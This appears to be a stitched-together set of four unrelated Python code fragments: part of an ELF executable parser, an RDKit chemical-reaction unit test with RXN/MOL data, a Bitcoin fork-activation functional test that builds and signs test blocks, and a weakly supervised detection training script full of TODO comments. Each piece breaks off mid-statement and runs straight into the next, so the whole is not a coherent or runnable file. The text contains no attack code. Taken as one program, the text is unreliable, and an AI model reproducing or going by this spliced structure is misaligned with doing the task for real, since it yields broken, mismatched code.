# PT_GNU_STACK only holds access rights
if outerSegment.elfN_Phdr.p_type == P_type.PT_GNU_STACK:
continue
for segmentWithin in self.segments:
# PT_GNU_STACK only holds access rights
if segmentWithin.elfN_Phdr.p_type == P_type.PT_GNU_STACK:
continue
# skip if segments are the same
if segmentWithin == outerSegment:
continue
# check if segmentWithin lies within the outerSegment
innerStart = segmentWithin.elfN_Phdr.p_offset
innerEnd = innerStart + segmentWithin.elfN_Phdr.p_filesz
outerStart = outerSegment.elfN_Phdr.p_offset
outerEnd = outerStart + outerSegment.elfN_Phdr.p_filesz
if outerStart <= innerStart and innerEnd <= outerEnd:
outerSegment.segmentsWithin.append(segmentWithin)
###############################################
# parse dynamic segment entries
'''
typedef struct {
Elf32_Sword d_tag;
union {
Elf32_Word d_val;
Elf32_Addr d_ptr;
} d_un;
} Elf32_Dyn;
typedef struct {
Elf64_Sxword d_tag;
union {
Elf64_Xword d_val;
Elf64_Addr d_ptr;
} d_un;
} Elf64_Dyn;
'''
# find dynamic segment
dynamicSegment = None
for segment in self.segments:
if segment.elfN_Phdr.p_type == P_type.PT_DYNAMIC:
dynamicSegment = segment
break
if dynamicSegment is None:
raise ValueError("Segment of type PT_DYNAMIC was not found.")
# create a list for all dynamic segment entries
self.dynamicSegmentEntries = list()
if self.bits == 32:
structFmt = '<II'
elif self.bits == 64:
structFmt = '<QQ'
dynSegEntrySize = struct.calcsize(structFmt)
endReached = False
for i in range((dynamicSegment.elfN_Phdr.p_filesz / dynSegEntrySize)):
# parse dynamic segment entry
dynSegmentEntry = ElfN_Dyn()
tempOffset = dynamicSegment.elfN_Phdr.p_offset + i*dynSegEntrySize
(
dynSegmentEntry.d_tag,
dynSegmentEntry.d_un,
) = struct.unpack(structFmt,
self.data[tempOffset:tempOffset+dynSegEntrySize])
del tempOffset
# add dynamic segment entry to list
self.dynamicSegmentEntries.append(dynSegmentEntry)
# check if the end of the dynamic segment array is reached
if dynSegmentEntry.d_tag == D_tag.DT_NULL:
endReached = True
break
# check if end was reached with PT_NULL entry
if not endReached:
raise ValueError("PT_NULL was not found in segment of type" \
+ "PT_DYNAMIC (malformed ELF executable/shared object).")
###############################################
# parse relocation entries
# search for relocation entries in dynamic segment entries
jmpRelOffset = None
pltRelSize = None
pltRelType = None
relEntrySize = None
relOffset = None
relSize = None
relaEntrySize = None
relaOffset = None
relaSize = None
symbolEntrySize = None
symbolTableOffset = None
stringTableOffset = None
stringTableSize = None
for dynEntry in self.dynamicSegmentEntries:
if dynEntry.d_tag == D_tag.DT_JMPREL:
if jmpRelOffset is not None:
raise ValueError("Can't handle multiple DT_JMPREL")
jmpRelOffset = self.virtualMemoryAddrToFileOffset(dynEntry.d_un)
continue
if dynEntry.d_tag == D_tag.DT_PLTRELSZ:
pltRelSize = dynEntry.d_un
continue
if dynEntry.d_tag == D_tag.DT_PLTREL:
pltRelType = dynEntry.d_un
continue
if dynEntry.d_tag == D_tag.DT_RELENT:
if relEntrySize is not None:
raise ValueError("Can't handle multiple DT_RELENT")
relEntrySize = dynEntry.d_un
continue
if dynEntry.d_tag == D_tag.DT_RELAENT:
if relaEntrySize is not None:
raise ValueError("Can't handle multiple DT_RELAENT")
relaEntrySize = dynEntry.d_un
continue
if dynEntry.d_tag == D_tag.DT_REL:
if relOffset is not None:
raise ValueError("Can't handle multiple DT_REL")
relOffset = self.virtualMemoryAddrToFileOffset(dynEntry.d_un)
continue
if dynEntry.d_tag == D_tag.DT_RELA:
if relaOffset is not None:
raise ValueError("Can't handle multiple DT_RELA")
relaOffset = self.virtualMemoryAddrToFileOffset(dynEntry.d_un)
continue
if dynEntry.d_tag == D_tag.DT_RELSZ:
relSize = dynEntry.d_un
continue
if dynEntry.d_tag == D_tag.DT_RELASZ:
relaSize = dynEntry.d_un
continue
if dynEntry.d_tag == D_tag.DT_SYMENT:
symbolEntrySize = dynEntry.d_un
continue
if dynEntry.d_tag == D_tag.DT_SYMTAB:
# get the offset in the file of the symbol table
symbolTableOffset = self.virtualMemoryAddrToFileOffset(
dynEntry.d_un)
continue
if dynEntry.d_tag == D_tag.DT_STRTAB:
# get the offset in the file of the string table
stringTableOffset = self.virtualMemoryAddrToFileOffset(
dynEntry.d_un)
continue
if dynEntry.d_tag == D_tag.DT_STRSZ:
stringTableSize = dynEntry.d_un
# check if ELF got needed entries
if (stringTableOffset is None
or stringTableSize is None
or symbolTableOffset is None
or symbolEntrySize is None):
raise ValueError("No dynamic section entry of type DT_STRTAB," \
" DT_STRSZ, DT_SYMTAB and/or DT_SYMENT found (malformed ELF" \
" executable/shared object).")
# estimate symbol table size in order to not rely on sections
# when ELF is compiled with gcc, the .dynstr section (string table)
# follows directly the .dynsym section (symbol table)
# => size of symbol table is difference between string and symbol table
estimatedSymbolTableSize = stringTableOffset - symbolTableOffset
# find .dynsym section in sections
# and only use if it exists once
dynSymSection = None
dynSymSectionDuplicated = False
dynSymSectionIgnore = False
dynSymEstimationIgnore = False
for section in self.sections:
if section.sectionName == ".dynsym":
# check if .dynsym section only exists once
# (because section entries are optional and can
# be easily manipulated)
if dynSymSection is None:
dynSymSection = section
# when .dynsym section exists multiple times
# do not use it
else:
dynSymSectionDuplicated = True
break
# check if .dynsym section exists
if dynSymSection is None:
print 'NOTE: ".dynsym" section was not found. Trying to use ' \
+ 'estimation to parse all symbols from the symbol table'
dynSymSectionIgnore = True
# check if .dynsym section was found multiple times
elif dynSymSectionDuplicated is True:
print 'NOTE: ".dynsym" section was found multiple times. ' \
+ 'Trying to use estimation to parse all symbols from' \
+ 'the symbol table'
dynSymSectionIgnore = True
# check if symbol table offset matches the offset of the
# ".dynsym" section
elif dynSymSection.elfN_shdr.sh_offset != symbolTableOffset:
print 'NOTE: ".dynsym" section offset does not match ' \
+ 'offset of symbol table. Ignoring the section ' \
+ | |
# Copyright (c) 2015, Novartis Institutes for BioMedical Research Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Novartis Institutes for BioMedical Research Inc.
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import unittest
import os,sys
import pickle
from rdkit import rdBase
from rdkit import Chem
from rdkit.Chem import rdChemReactions, AllChem
from rdkit import Geometry
from rdkit import RDConfig
import itertools, time
test_data = [("good", '''$RXN
ISIS 052820091627
2 1
$MOL
-ISIS- 05280916272D
2 1 0 0 0 0 0 0 0 0999 V2000
-3.2730 -7.0542 0.0000 Br 0 0 0 0 0 0 0 0 0 0 0 0
-3.9875 -7.4667 0.0000 R# 0 0 0 0 0 0 0 0 0 1 0 0
1 2 1 0 0 0 0
V 1 halogen.bromine.aromatic
M RGP 1 2 1
M END
$MOL
-ISIS- 05280916272D
4 3 0 0 0 0 0 0 0 0999 V2000
3.4375 -7.7917 0.0000 R# 0 0 0 0 0 0 0 0 0 2 0 0
4.1520 -7.3792 0.0000 B 0 0 0 0 0 0 0 0 0 0 0 0
4.1520 -6.5542 0.0000 O 0 0 0 0 0 0 0 0 0 0 0 0
4.8664 -7.7917 0.0000 O 0 0 0 0 0 0 0 0 0 0 0 0
2 3 1 0 0 0 0
1 2 1 0 0 0 0
2 4 1 0 0 0 0
V 2 boronicacid
M RGP 1 1 2
M END
$MOL
-ISIS- 05280916272D
2 1 0 0 0 0 0 0 0 0999 V2000
11.2667 -7.3417 0.0000 R# 0 0 0 0 0 0 0 0 0 1 0 0
11.9811 -6.9292 0.0000 R# 0 0 0 0 0 0 0 0 0 2 0 0
1 2 1 0 0 0 0
M RGP 2 1 1 2 2
M END'''),
("bad", '''$RXN
ISIS 052820091627
2 1
$MOL
-ISIS- 05280916272D
2 1 0 0 0 0 0 0 0 0999 V2000
-3.2730 -7.0542 0.0000 Br 0 0 0 0 0 0 0 0 0 0 0 0
-3.9875 -7.4667 0.0000 R# 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0 0 0
V 1 halogen.bromine.aromatic
M RGP 1 2 1
M END
$MOL
-ISIS- 05280916272D
4 3 0 0 0 0 0 0 0 0999 V2000
3.4375 -7.7917 0.0000 R# 0 0 0 0 0 0 0 0 0 0 0 0
4.1520 -7.3792 0.0000 B 0 0 0 0 0 0 0 0 0 0 0 0
4.1520 -6.5542 0.0000 O 0 0 0 0 0 0 0 0 0 0 0 0
4.8664 -7.7917 0.0000 O 0 0 0 0 0 0 0 0 0 0 0 0
2 3 1 0 0 0 0
1 2 1 0 0 0 0
2 4 1 0 0 0 0
V 2 boronicacid
M RGP 1 1 2
M END
$MOL
-ISIS- 05280916272D
2 1 0 0 0 0 0 0 0 0999 V2000
11.2667 -7.3417 0.0000 R# 0 0 0 0 0 0 0 0 0 0 0 0
11.9811 -6.9292 0.0000 R# 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0 0 0
M RGP 2 1 1 2 2
M END'''),
# chemdraw style
("bad", '''$RXN
ISIS 052820091627
2 1
$MOL
-ISIS- 05280916272D
2 1 0 0 0 0 0 0 0 0999 V2000
-3.2730 -7.0542 0.0000 Br 0 0 0 0 0 0 0 0 0 0 0 0
-3.9875 -7.4667 0.0000 R1 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0 0 0
V 1 halogen.bromine.aromatic
M END
$MOL
-ISIS- 05280916272D
4 3 0 0 0 0 0 0 0 0999 V2000
3.4375 -7.7917 0.0000 R2 0 0 0 0 0 0 0 0 0 0 0 0
4.1520 -7.3792 0.0000 B 0 0 0 0 0 0 0 0 0 0 0 0
4.1520 -6.5542 0.0000 O 0 0 0 0 0 0 0 0 0 0 0 0
4.8664 -7.7917 0.0000 O 0 0 0 0 0 0 0 0 0 0 0 0
2 3 1 0 0 0 0
1 2 1 0 0 0 0
2 4 1 0 0 0 0
V 2 boronicacid
M END
$MOL
-ISIS- 05280916272D
2 1 0 0 0 0 0 0 0 0999 V2000
11.2667 -7.3417 0.0000 R1 0 0 0 0 0 0 0 0 0 0 0 0
11.9811 -6.9292 0.0000 R2 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0 0 0
M END'''),
("fail", '''$RXN
ISIS 052820091627
2 1
$MOL
-ISIS- 05280916272D
2 1 0 0 0 0 0 0 0 0999 V2000
-3.2730 -7.0542 0.0000 Br 0 0 0 0 0 0 0 0 0 0 0 0
-3.9875 -7.4667 0.0000 R1 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0 0 0
V 1 halogen.bromine.aromatic
M END
$MOL
-ISIS- 05280916272D
4 3 0 0 0 0 0 0 0 0999 V2000
3.4375 -7.7917 0.0000 R3 0 0 0 0 0 0 0 0 0 0 0 0
4.1520 -7.3792 0.0000 B 0 0 0 0 0 0 0 0 0 0 0 0
4.1520 -6.5542 0.0000 O 0 0 0 0 0 0 0 0 0 0 0 0
4.8664 -7.7917 0.0000 O 0 0 0 0 0 0 0 0 0 0 0 0
2 3 1 0 0 0 0
1 2 1 0 0 0 0
2 4 1 0 0 0 0
V 2 boronicacid
M END
$MOL
-ISIS- 05280916272D
2 1 0 0 0 0 0 0 0 0999 V2000
11.2667 -7.3417 0.0000 R1 0 0 0 0 0 0 0 0 0 0 0 0
11.9811 -6.9292 0.0000 R2 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0 0 0
M END'''),
]
unused_rlabel_in_product = """$RXN
bug.rxn
ChemDraw06121709062D
1 1
$MOL
2 1 0 0 0 0 0 0 0 0999 V2000
0.1604 0.3798 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
-0.1604 -0.3798 0.0000 R 0 0 0 0 0 0 0 0 0 1 0 0
1 2 1 0 0
M END
$MOL
2 1 0 0 0 0 0 0 0 0999 V2000
-1.2690 -1.3345 0.0000 R 0 0 0 0 0 0 0 0 0 1 0 0
1.2690 1.3345 0.0000 R1 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0
M END
"""
kekule_rxn = """$RXN
bug.rxn
ChemDraw06121709062D
1 1
$MOL
RDKit 2D
6 6 0 0 0 0 0 0 0 0999 V2000
1.5000 0.0000 0.0000 C 0 0 0 0 0 | |
<gh_stars>1-10
#!/usr/bin/env python3
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Copyright (c) 2017 The Bitcoin developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""
This test checks activation of UAHF and the different consensus
related to this activation.
It is derived from the much more complex p2p-fullblocktest.
"""
from test_framework.test_framework import ComparisonTestFramework
from test_framework.util import *
from test_framework.comptool import TestManager, TestInstance, RejectResult
from test_framework.blocktools import *
import time
from test_framework.key import CECKey
from test_framework.script import *
from test_framework.cdefs import *
# Error for illegal use of SIGHASH_FORKID
SIGHASH_FORKID_ERROR = b'non-mandatory-script-verify-flag (Illegal use of SIGHASH_FORKID)'
RPC_SIGHASH_FORKID_ERROR = "64: " + SIGHASH_FORKID_ERROR.decode("utf-8")
SIGHASH_INVALID_ERROR = b'mandatory-script-verify-flag-failed (Script evaluated without error but finished with a false/empty top stack e'
# far into the future
UAHF_START_TIME = 2000000000
class PreviousSpendableOutput(object):
def __init__(self, tx=CTransaction(), n=-1):
self.tx = tx
self.n = n # the output we're spending
class FullBlockTest(ComparisonTestFramework):
# Can either run this test as 1 node with expected answers, or two and compare them.
# Change the "outcome" variable from each TestInstance object to only do
# the comparison.
def __init__(self):
super().__init__()
self.num_nodes = 1
self.block_heights = {}
self.coinbase_key = CECKey()
self.coinbase_key.set_secretbytes(b"fatstacks")
self.coinbase_pubkey = self.coinbase_key.get_pubkey()
self.forkid_key = CECKey()
self.forkid_key.set_secretbytes(b"forkid")
self.forkid_pubkey = self.forkid_key.get_pubkey()
self.tip = None
self.uahfEnabled = False
self.blocks = {}
def setup_network(self):
self.extra_args = [['-debug',
'-norelaypriority',
"-uahfstarttime=%d" % UAHF_START_TIME,
'-whitelist=127.0.0.1',
'-par=1']]
self.nodes = start_nodes(self.num_nodes, self.options.tmpdir,
self.extra_args,
binary=[self.options.testbinary])
def add_options(self, parser):
super().add_options(parser)
parser.add_option(
"--runbarelyexpensive", dest="runbarelyexpensive", default=True)
def run_test(self):
self.test = TestManager(self, self.options.tmpdir)
self.test.add_all_connections(self.nodes)
# Start up network handling in another thread
NetworkThread().start()
# Mock the time so that block activating the HF will be accepted
self.nodes[0].setmocktime(UAHF_START_TIME)
self.test.run()
def add_transactions_to_block(self, block, tx_list):
[tx.rehash() for tx in tx_list]
block.vtx.extend(tx_list)
# this is a little handier to use than the version in blocktools.py
def create_tx(self, spend_tx, n, value, script=CScript([OP_TRUE])):
tx = create_transaction(spend_tx, n, b"", value, script)
return tx
# sign a transaction, using the key we know about
# this signs input 0 in tx, which is assumed to be spending output n in
# spend_tx
def sign_tx(self, tx, spend_tx, n):
scriptPubKey = bytearray(spend_tx.vout[n].scriptPubKey)
if (scriptPubKey[0] == OP_TRUE): # an anyone-can-spend
tx.vin[0].scriptSig = CScript()
return
(sighash, err) = SignatureHash(
spend_tx.vout[n].scriptPubKey, tx, 0, SIGHASH_ALL)
tx.vin[0].scriptSig = CScript(
[self.coinbase_key.sign(sighash) + bytes(bytearray([SIGHASH_ALL]))])
def create_and_sign_transaction(self, spend_tx, n, value, script=CScript([OP_TRUE])):
tx = self.create_tx(spend_tx, n, value, script)
self.sign_tx(tx, spend_tx, n)
tx.rehash()
return tx
def next_block(self, number, spend=None, additional_coinbase_value=0, script=None, extra_sigops=0, block_size=0, solve=True):
"""
Create a block on top of self.tip, and advance self.tip to point to the new block
if spend is specified, then 1 satoshi will be spent from that to an anyone-can-spend
output, and rest will go to fees.
"""
if self.tip == None:
base_block_hash = self.genesis_hash
block_time = int(time.time()) + 1
else:
base_block_hash = self.tip.sha256
block_time = self.tip.nTime + 1
# First create the coinbase
height = self.block_heights[base_block_hash] + 1
coinbase = create_coinbase(height, self.coinbase_pubkey)
coinbase.vout[0].nValue += additional_coinbase_value
if (spend != None):
coinbase.vout[0].nValue += spend.tx.vout[
spend.n].nValue - 1 # all but one satoshi to fees
coinbase.rehash()
block = create_block(base_block_hash, coinbase, block_time)
spendable_output = None
if (spend != None):
tx = CTransaction()
tx.vin.append(
CTxIn(COutPoint(spend.tx.sha256, spend.n), b"", 0xffffffff)) # no signature yet
# This copies the java comparison tool testing behavior: the first
# txout has a garbage scriptPubKey, "to make sure we're not
# pre-verifying too much" (?)
tx.vout.append(
CTxOut(0, CScript([random.randint(0, 255), height & 255])))
if script == None:
tx.vout.append(CTxOut(1, CScript([OP_TRUE])))
else:
tx.vout.append(CTxOut(1, script))
spendable_output = PreviousSpendableOutput(tx, 0)
# Now sign it if necessary
scriptSig = b""
scriptPubKey = bytearray(spend.tx.vout[spend.n].scriptPubKey)
if (scriptPubKey[0] == OP_TRUE): # looks like an anyone-can-spend
scriptSig = CScript([OP_TRUE])
else:
# We have to actually sign it
nHashType = SIGHASH_ALL
sighash = None
if self.uahfEnabled == False:
(sighash, err) = SignatureHash(
spend.tx.vout[spend.n].scriptPubKey, tx, 0, SIGHASH_ALL)
else:
nHashType |= SIGHASH_FORKID
sighash = SignatureHashForkId(
spend.tx.vout[spend.n].scriptPubKey, tx, 0, nHashType, spend.tx.vout[spend.n].nValue)
scriptSig = CScript(
[self.coinbase_key.sign(sighash) + bytes(bytearray([nHashType]))])
tx.vin[0].scriptSig = scriptSig
# Now add the transaction to the block
self.add_transactions_to_block(block, [tx])
block.hashMerkleRoot = block.calc_merkle_root()
if spendable_output != None and block_size > 0:
while len(block.serialize()) < block_size:
tx = CTransaction()
script_length = block_size - len(block.serialize()) - 79
if script_length > 510000:
script_length = 500000
tx_sigops = min(
extra_sigops, script_length, MAX_TX_SIGOPS_COUNT)
extra_sigops -= tx_sigops
script_pad_len = script_length - tx_sigops
script_output = CScript(
[b'\x00' * script_pad_len] + [OP_CHECKSIG] * tx_sigops)
tx.vout.append(CTxOut(0, CScript([OP_TRUE])))
tx.vout.append(CTxOut(0, script_output))
tx.vin.append(
CTxIn(COutPoint(spendable_output.tx.sha256, spendable_output.n)))
spendable_output = PreviousSpendableOutput(tx, 0)
self.add_transactions_to_block(block, [tx])
block.hashMerkleRoot = block.calc_merkle_root()
# Make sure the math above worked out to produce the correct block size
# (the math will fail if there are too many transactions in the block)
assert_equal(len(block.serialize()), block_size)
# Make sure all the requested sigops have been included
assert_equal(extra_sigops, 0)
if solve:
block.solve()
self.tip = block
self.block_heights[block.sha256] = height
assert number not in self.blocks
self.blocks[number] = block
return block
def get_tests(self):
self.genesis_hash = int(self.nodes[0].getbestblockhash(), 16)
self.block_heights[self.genesis_hash] = 0
spendable_outputs = []
# save the current tip so it can be spent by a later block
def save_spendable_output():
spendable_outputs.append(self.tip)
# get an output that we previously marked as spendable
def get_spendable_output():
return PreviousSpendableOutput(spendable_outputs.pop(0).vtx[0], 0)
# returns a test case that asserts that the current tip was accepted
def accepted():
return TestInstance([[self.tip, True]])
# returns a test case that asserts that the current tip was rejected
def rejected(reject=None):
if reject is None:
return TestInstance([[self.tip, False]])
else:
return TestInstance([[self.tip, reject]])
# move the tip back to a previous block
def tip(number):
self.tip = self.blocks[number]
# adds transactions to the block and updates state
def update_block(block_number, new_transactions):
block = self.blocks[block_number]
self.add_transactions_to_block(block, new_transactions)
old_sha256 = block.sha256
block.hashMerkleRoot = block.calc_merkle_root()
block.solve()
# Update the internal state just like in next_block
self.tip = block
if block.sha256 != old_sha256:
self.block_heights[
block.sha256] = self.block_heights[old_sha256]
del self.block_heights[old_sha256]
self.blocks[block_number] = block
return block
# shorthand for functions
block = self.next_block
node = self.nodes[0]
# Create a new block
block(0, block_size=LEGACY_MAX_BLOCK_SIZE)
save_spendable_output()
yield accepted()
# Now we need that block to mature so we can spend the coinbase.
test = TestInstance(sync_every_block=False)
for i in range(99):
block(5000 + i)
test.blocks_and_transactions.append([self.tip, True])
save_spendable_output()
yield test
# collect spendable outputs now to avoid cluttering the code later on
out = []
for i in range(100):
out.append(get_spendable_output())
# block up to LEGACY_MAX_BLOCK_SIZE are accepted.
block(1, spend=out[0], block_size=LEGACY_MAX_BLOCK_SIZE)
yield accepted()
# bigger block are reject as the fork isn't activated yet.
block(2, spend=out[1], block_size=LEGACY_MAX_BLOCK_SIZE + 1)
yield rejected(RejectResult(16, b'bad-blk-length'))
# Rewind bad block
tip(1)
# Create a transaction that we will use to test SIGHASH_FORID
script_forkid = CScript([self.forkid_pubkey, OP_CHECKSIG])
tx_forkid = self.create_and_sign_transaction(
out[1].tx, out[1].n, 1, script_forkid)
# Create a block that would activate the HF. We also add the
# transaction that will allow us to test SIGHASH_FORKID
b03 = block(3)
b03.nTime = UAHF_START_TIME
update_block(3, [tx_forkid])
yield accepted()
# Pile up 4 blocks on top to get to the point just before activation.
block(4, spend=out[2])
yield accepted()
block(5, spend=out[3])
yield accepted()
block(6, spend=out[4])
yield accepted()
block(7, spend=out[5])
yield accepted()
# bigger block are still rejected as the fork isn't activated yet.
block(8, spend=out[6], block_size=LEGACY_MAX_BLOCK_SIZE + 1)
yield rejected(RejectResult(16, b'bad-blk-length'))
# Rewind bad block
tip(7)
# build a transaction using SIGHASH_FORKID
tx_spend = self.create_tx(tx_forkid, 0, 1, CScript([OP_TRUE]))
sighash_spend = SignatureHashForkId(
script_forkid, tx_spend, 0, SIGHASH_FORKID | SIGHASH_ALL, 1)
sig_forkid = self.forkid_key.sign(sighash_spend)
tx_spend.vin[0].scriptSig = CScript(
[sig_forkid + bytes(bytearray([SIGHASH_FORKID | SIGHASH_ALL]))])
tx_spend.rehash()
# This transaction can't get into the mempool yet
try:
node.sendrawtransaction(ToHex(tx_spend))
except JSONRPCException as exp:
assert_equal(exp.error["message"], RPC_SIGHASH_FORKID_ERROR)
else:
assert(False)
# The transaction is rejected, so the mempool should still be empty
assert_equal(set(node.getrawmempool()), set())
# check that SIGHASH_FORKID transaction are still rejected
block(9)
update_block(9, [tx_spend])
yield rejected(RejectResult(16, SIGHASH_INVALID_ERROR))
# Rewind bad block
tip(7)
# Pile up another block, to activate. OP_RETURN anti replay
# outputs are still considered valid.
antireplay_script = CScript([OP_RETURN, ANTI_REPLAY_COMMITMENT])
block(10, spend=out[6], script=antireplay_script)
yield accepted()
# Now that the HF is activated, replay protected tx are
# accepted in the mempool
tx_spend_id = node.sendrawtransaction(ToHex(tx_spend))
assert_equal(set(node.getrawmempool()), {tx_spend_id})
# Mark the HF
self.uahfEnabled = True
# HF is active now, we MUST create a big block.
block(11, spend=out[7], block_size=LEGACY_MAX_BLOCK_SIZE)
yield rejected(RejectResult(16, b'bad-blk-too-small'))
# Rewind bad | |
<reponame>Aks-Dmv/WSDDN
import argparse
import os
import shutil
import time
import sys
import sklearn
import sklearn.metrics
import torch
torch.cuda.init()
import torch.nn as nn
import torch.nn.parallel
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
import torch.distributed as dist
import torch.optim
import torch.utils.data
import torch.utils.data.distributed
import torchvision.transforms as transforms
import torchvision.datasets as datasets
import torchvision.models as models
from AlexNet import *
from voc_dataset import *
from utils import *
import wandb
USE_WANDB = True # use flags, wandb is not convenient for debugging
model_names = sorted(name for name in models.__dict__
if name.islower() and not name.startswith("__")
and callable(models.__dict__[name]))
parser = argparse.ArgumentParser(description='PyTorch ImageNet Training')
parser.add_argument('--arch', default='localizer_alexnet')
parser.add_argument(
'-j',
'--workers',
default=4,
type=int,
metavar='N',
help='number of data loading workers (default: 4)')
parser.add_argument(
'--epochs',
default=30,
type=int,
metavar='N',
help='number of total epochs to run')
parser.add_argument(
'--start-epoch',
default=0,
type=int,
metavar='N',
help='manual epoch number (useful on restarts)')
parser.add_argument(
'-b',
'--batch-size',
default=256,
type=int,
metavar='N',
help='mini-batch size (default: 256)')
parser.add_argument(
'--lr',
'--learning-rate',
default=0.1,
type=float,
metavar='LR',
help='initial learning rate')
parser.add_argument(
'--momentum', default=0.9, type=float, metavar='M', help='momentum')
parser.add_argument(
'--weight-decay',
'--wd',
default=1e-4,
type=float,
metavar='W',
help='weight decay (default: 1e-4)')
parser.add_argument(
'--print-freq',
'-p',
default=10,
type=int,
metavar='N',
help='print frequency (default: 10)')
parser.add_argument(
'--eval-freq',
default=2,
type=int,
metavar='N',
help='print frequency (default: 10)')
parser.add_argument(
'--resume',
default='',
type=str,
metavar='PATH',
help='path to latest checkpoint (default: none)')
parser.add_argument(
'-e',
'--evaluate',
dest='evaluate',
action='store_true',
help='evaluate model on validation set')
parser.add_argument(
'--pretrained',
dest='pretrained',
action='store_true',
help='use pre-trained model')
parser.add_argument(
'--world-size',
default=1,
type=int,
help='number of distributed processes')
parser.add_argument(
'--dist-url',
default='tcp://172.16.31.10:23456',
type=str,
help='url used to set up distributed training')
parser.add_argument(
'--dist-backend', default='gloo', type=str, help='distributed backend')
parser.add_argument('--vis', action='store_true')
best_prec1 = 0
cntr_train = 0
cntr_val = 0
def main():
global args, best_prec1, cntr_train, cntr_val
args = parser.parse_args()
args.distributed = args.world_size > 1
# create model
print("=> creating model '{}'".format(args.arch))
if args.arch == 'localizer_alexnet':
model = localizer_alexnet(pretrained=args.pretrained)
elif args.arch == 'localizer_alexnet_robust':
model = localizer_alexnet_robust(pretrained=args.pretrained)
print(model)
model = torch.nn.DataParallel(model)
model.cuda()
# TODO:
# define loss function (criterion) and optimizer
# also use an LR scheduler to decay LR by 10 every 30 epochs
# you can also use PlateauLR scheduler, which usually works well
criterion = nn.BCEWithLogitsLoss()
optimizer = torch.optim.Adam(model.parameters(), lr=args.lr)
training_scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min')
# optionally resume from a checkpoint
if args.resume:
if os.path.isfile(args.resume):
print("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
args.start_epoch = checkpoint['epoch']
best_prec1 = checkpoint['best_prec1']
model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
print("=> loaded checkpoint '{}' (epoch {})".format(
args.resume, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(args.resume))
cudnn.benchmark = True
# Data loading code
#TODO: Create Datasets and Dataloaders using VOCDataset - Ensure that the sizes are as required
# Also ensure that data directories are correct - the ones use for testing by TAs might be different
# Resize the images to 512x512
train_dataset = VOCDataset(image_size=512)
val_dataset = VOCDataset(split='test', image_size=512)
def collate_fn(batch):
return tuple(zip(*batch))
train_sampler = None
train_loader = torch.utils.data.DataLoader(
train_dataset,
batch_size=args.batch_size,
# shuffle=(train_sampler is None),
shuffle=False,
num_workers=args.workers,
pin_memory=True,
sampler=train_sampler,
drop_last=True, collate_fn=collate_fn)
val_loader = torch.utils.data.DataLoader(
val_dataset,
batch_size=args.batch_size,
shuffle=False,
num_workers=args.workers,
pin_memory=True,
drop_last=True, collate_fn=collate_fn)
if args.evaluate:
validate(val_loader, model, criterion)
return
# TODO: Create loggers for wandb - ideally, use flags since wandb makes it harder to debug code.
if USE_WANDB:
wandb.init(project="vlr2", reinit=True)
for epoch in range(args.start_epoch, args.epochs):
# adjust_learning_rate(optimizer, epoch)
# train for one epoch
loss = train(train_loader, model, criterion, optimizer, epoch)
# training_scheduler.step(loss)
# evaluate on validation set
if epoch % args.eval_freq == 0 or epoch == args.epochs - 1:
m1, m2 = validate(val_loader, model, criterion, epoch)
score = m1 * m2
# remember best prec@1 and save checkpoint
is_best = score > best_prec1
best_prec1 = max(score, best_prec1)
save_checkpoint({
'epoch': epoch + 1,
'arch': args.arch,
'state_dict': model.state_dict(),
'best_prec1': best_prec1,
'optimizer': optimizer.state_dict(),
}, is_best)
#TODO: You can add input arguments if you wish
def train(train_loader, model, criterion, optimizer, epoch):
global cntr_train
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
avg_m1 = AverageMeter()
avg_m2 = AverageMeter()
# switch to train mode
model.train()
end = time.time()
for i, (data) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
# TODO: Get inputs from the data dict
# TODO: Get output from model
# TODO: Perform any necessary functions on the output such as clamping
# TODO: Compute loss using ``criterion``
img_input = torch.stack(data[0], dim=0).cuda()
target = torch.stack(data[1], dim=0).cuda()
wgt = torch.stack(data[2], dim=0).cuda()
# TODO: Get output from model
# TODO: Perform any necessary functions on the output such as clamping
# TODO: Compute loss using ``criterion``
optimizer.zero_grad()
output_heatmap = model(img_input)
if args.arch == 'localizer_alexnet':
max_pool_k = output_heatmap.shape[2]
